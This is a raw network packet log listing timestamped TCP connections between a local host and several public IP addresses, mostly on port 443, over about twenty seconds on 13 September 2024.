                                      Sep 13, 2024 15:15:59.777791023 CEST49759443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:15:59.777831078 CEST4434975935.190.80.1192.168.2.4
                                      Sep 13, 2024 15:15:59.777869940 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:15:59.777910948 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:15:59.779537916 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:15:59.780069113 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:15:59.780086040 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.439402103 CEST44349741142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:00.439575911 CEST44349741142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:00.439635038 CEST49741443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:00.440857887 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.441028118 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.441157103 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:00.441171885 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.441306114 CEST49763443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.441344976 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.441497087 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.441644907 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.441911936 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:00.441983938 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.442317963 CEST49763443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.442389011 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.442531109 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:00.442640066 CEST49763443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.487405062 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.487422943 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.573127985 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.573579073 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:00.573656082 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.573705912 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:00.573707104 CEST4434976435.190.80.1192.168.2.4
                                      Sep 13, 2024 15:16:00.573761940 CEST49764443192.168.2.435.190.80.1
                                      Sep 13, 2024 15:16:00.594706059 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.594769001 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.594811916 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.594827890 CEST49763443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.594885111 CEST49763443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.595546961 CEST49763443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.595582962 CEST44349763104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.649857998 CEST49741443192.168.2.4142.250.185.228
                                      Sep 13, 2024 15:16:00.649878979 CEST44349741142.250.185.228192.168.2.4
                                      Sep 13, 2024 15:16:00.650398016 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.650445938 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:00.650511026 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.650883913 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:00.650897980 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.107089996 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.157704115 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.214873075 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.214904070 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.216332912 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.222026110 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.222232103 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.222654104 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.263415098 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.330703020 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.330853939 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.330912113 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.404733896 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.404815912 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.404900074 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.405311108 CEST49766443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.405380011 CEST44349766104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.406090021 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.406126022 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.620397091 CEST4972380192.168.2.4199.232.214.172
                                      Sep 13, 2024 15:16:01.625719070 CEST8049723199.232.214.172192.168.2.4
                                      Sep 13, 2024 15:16:01.625790119 CEST4972380192.168.2.4199.232.214.172
                                      Sep 13, 2024 15:16:01.889523983 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.890671015 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.890712023 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.891921043 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.894442081 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.894622087 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.894644976 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:01.935425043 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:01.936294079 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:02.074064016 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:02.074142933 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:02.074207067 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:02.371723890 CEST49767443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:02.371761084 CEST44349767104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:02.800322056 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:02.800367117 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:02.800462008 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:02.800765991 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:02.800781965 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.059748888 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.059784889 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.059871912 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.061780930 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.061803102 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.260065079 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.262025118 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.262044907 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.263156891 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.265223026 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.265429974 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.265496969 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.311399937 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.390458107 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.403258085 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.403459072 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.403548956 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.452104092 CEST49770443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.452135086 CEST44349770104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.521141052 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.521758080 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.521825075 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.522948027 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.523703098 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.523895979 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.523929119 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.524127007 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.524184942 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.524305105 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.524374962 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777299881 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777424097 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777514935 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777604103 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777616978 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.777693987 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777765036 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.777782917 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777839899 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.777853012 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.777980089 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.778037071 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.778052092 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.778143883 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.778202057 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.778214931 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:03.889715910 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:03.889729023 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.039803982 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.039904118 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.039915085 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.039994955 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040066004 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.040086031 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040185928 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040237904 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.040267944 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040349960 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040405989 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.040420055 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040518045 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040575027 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.040589094 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040683031 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.040755033 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.059595108 CEST44349740104.18.68.40192.168.2.4
                                      Sep 13, 2024 15:16:04.059813976 CEST44349740104.18.68.40192.168.2.4
                                      Sep 13, 2024 15:16:04.059876919 CEST49740443192.168.2.4104.18.68.40
                                      Sep 13, 2024 15:16:04.138411999 CEST49772443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.138449907 CEST44349772104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.458180904 CEST49740443192.168.2.4104.18.68.40
                                      Sep 13, 2024 15:16:04.458250046 CEST44349740104.18.68.40192.168.2.4
                                      Sep 13, 2024 15:16:04.459166050 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.459225893 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:04.459296942 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.459958076 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:04.459994078 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.094275951 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.114696026 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:05.114739895 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.116163969 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.167201042 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:05.167464018 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.175802946 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:05.223404884 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.283046007 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.283190012 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:05.283255100 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:05.284703970 CEST49774443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:05.284735918 CEST44349774104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.281506062 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.281614065 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.281717062 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.282752991 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.282793045 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.752245903 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.752552986 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.752582073 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.753074884 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.753376961 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.753457069 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.753535032 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.753623009 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.753655910 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:16.753746033 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:16.753777981 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005024910 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005079985 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005115986 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005151033 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.005167961 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005181074 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005233049 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.005250931 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005265951 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.005316019 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.006779909 CEST49775443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.006797075 CEST44349775104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.045655012 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.045702934 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.045852900 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.045909882 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.045979023 CEST44349777188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.046108961 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.046479940 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.046497107 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.047142029 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.047164917 CEST44349777188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.051848888 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.051896095 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.052221060 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.052367926 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.052382946 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.512782097 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.514188051 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.514204025 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.515664101 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.515841961 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.516401052 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.516464949 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.516464949 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.516483068 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.516680956 CEST44349776188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.516760111 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.516760111 CEST49776443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.517081976 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.517112017 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.517255068 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.517472982 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.517487049 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.522901058 CEST44349777188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.523148060 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.523169041 CEST44349777188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.524619102 CEST44349777188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.525111914 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525180101 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525278091 CEST44349777188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.525301933 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525301933 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525367022 CEST49777443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525650024 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525691986 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.525788069 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525943995 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.525959969 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.534341097 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.534924030 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.534981012 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.535321951 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.535619020 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.535685062 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.535784006 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.583394051 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.827516079 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.827594995 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.827661991 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.829193115 CEST49778443192.168.2.4104.18.95.41
                                      Sep 13, 2024 15:16:17.829225063 CEST44349778104.18.95.41192.168.2.4
                                      Sep 13, 2024 15:16:17.986574888 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.986907959 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.986968040 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.990262032 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.990341902 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.990900040 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.991010904 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:17.991086006 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.991086006 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:17.991112947 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.008162975 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.008414030 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.008425951 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.009929895 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.010138035 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.010241985 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.010329962 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.035414934 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.045327902 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.060486078 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.060518026 CEST44349779188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.100730896 CEST49779443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.609841108 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.609909058 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.609949112 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.609993935 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.610039949 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.610043049 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.610111952 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.610146046 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.610210896 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.610263109 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.851598978 CEST49780443192.168.2.4188.114.96.3
                                      Sep 13, 2024 15:16:18.851643085 CEST44349780188.114.96.3192.168.2.4
                                      Sep 13, 2024 15:16:18.870529890 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:18.870573997 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:18.870677948 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:18.871093035 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:18.871108055 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.335122108 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.335416079 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.335452080 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.336909056 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.337044954 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.338105917 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.338136911 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.338141918 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.338207960 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.391573906 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.391587019 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.438061953 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.479007006 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479069948 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479110003 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479145050 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479161024 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.479181051 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479196072 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479240894 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.479242086 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.479264975 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479486942 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479567051 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479598999 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.479715109 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.479715109 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.479726076 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.532313108 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.532342911 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.565815926 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.565891981 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.565911055 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.565942049 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.566098928 CEST44349781104.17.24.14192.168.2.4
                                      Sep 13, 2024 15:16:19.566157103 CEST49781443192.168.2.4104.17.24.14
                                      Sep 13, 2024 15:16:19.566174030 CEST44349781104.17.24.14192.168.2.4
